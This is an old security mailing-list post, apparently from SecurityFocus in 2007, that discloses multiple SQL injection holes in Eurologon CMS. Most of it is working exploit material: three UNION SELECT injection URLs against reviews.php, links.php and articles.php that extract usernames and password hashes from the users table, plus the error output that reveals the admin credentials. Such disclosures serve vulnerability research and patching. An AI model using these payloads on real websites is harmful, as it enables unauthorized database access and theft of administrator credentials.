Eurologon CMS Multiple SQL Injection Nov 27 2007 05:26PM
kingoftheworld92 fastwebnet it
---------------------------------------------------------------

____ __________ __ ____ __

/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_

| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __ | | | \ | |/ \ \___| | /_____/ | || |

|___|___| /\__| /______ /\___ >__| |___||__|

\/\______| \/ \/

---------------------------------------------------------------

Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org

---------------------------------------------------------------

Eurologon CMS Multiple SQL Injection

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------

PoC

Useless..

---------------------------------------------------------------

Exploits

http://[target]/reviews.php?id='+union+select+1,concat(username,0x3a,pas
sword)+from+users/*

http://[target]/links.php?id='+union+select+1,concat(username,0x3a,passw
ord)+from+users/*

http://[target]/articles.php?id='+union+select+1,concat(username,0x3a,pa
ssword)+from+users/*

---------------------------------------------------------------

Result

You will see the disclosed informations under some mysql errors like:

Can't execute query

[QUERY]

MySQL Error: The used SELECT statements have a different number of columns

Can't execute query

[QUERY]

MySQL Error: The used SELECT statements have a different number of columns

Can't execute query

[QUERY]

MySQL Error: The used SELECT statements have a different number of columns

Home > [category_name] > [category_name] > [admin_name]:[admin_hash]

---------------------------------------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus